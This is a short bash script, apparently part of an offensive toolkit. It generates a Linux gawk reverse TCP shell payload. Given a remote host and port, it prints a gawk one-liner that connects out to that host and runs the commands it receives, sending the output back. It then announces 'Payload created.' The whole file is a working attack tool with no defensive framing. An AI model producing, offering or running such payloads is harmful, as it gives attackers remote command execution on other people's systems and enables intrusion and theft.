#!/bin/bash

function Craft_linux_gawk_reverse_shell(){

        if [ -z "$1" ] || [ -z "$2" ]
        then
                printf "Auto-gen Linux gawk reverse tcp shell\n"
                printf "Usage bash linux_gawk-reverse-tcp <rhost> <rport>\n"
                exit
        fi

        rhost="$1"
        rport="$2"

        printf "\n"
	printf "gawk 'BEGIN {P=$rport;S=\"> \";H=\"$rhost\";V=\"/inet/tcp/0/\"H\"/\"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print \$0|&V;close(c)}}while(c!=\"exit\")close(V)}}'"
        printf "\n\n[\e[0;32m+\e[0m] Payload created.\n"

}

Craft_linux_gawk_reverse_shell "$1" "$2"
